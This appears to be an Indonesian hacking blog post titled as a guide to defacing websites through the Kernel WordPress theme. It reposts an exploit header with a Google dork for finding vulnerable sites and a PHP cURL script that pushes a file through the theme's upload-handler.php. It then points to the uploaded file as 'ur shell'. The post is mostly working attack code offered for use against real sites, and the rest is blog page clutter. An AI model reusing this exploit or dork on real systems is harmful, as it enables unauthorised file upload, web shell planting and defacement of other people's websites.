Deface Menggunakan WordPress Theme Kernel

###################################################################################################

# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability

# Author: iskorpitx

# Date: 6/11/2013

# Vendor Homepage: http://www.wikmag.com/

# Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077

# Infected File: upload-handler.php

# Category: webapps

# Google dork: inurl:/wp-content/themes/kernel-theme/

# Tested on : Windows/Linux

###################################################################################################

# Exploit

<?php

$uploadfile="upload.php";

$ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch); print "$postResult";

?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php < ur shell

CowoKerensTeam

Header Ads

Deface Menggunakan WordPress Theme Kernel

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

Deface Menggunakan WordPress Theme Kernel

Related Posts

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts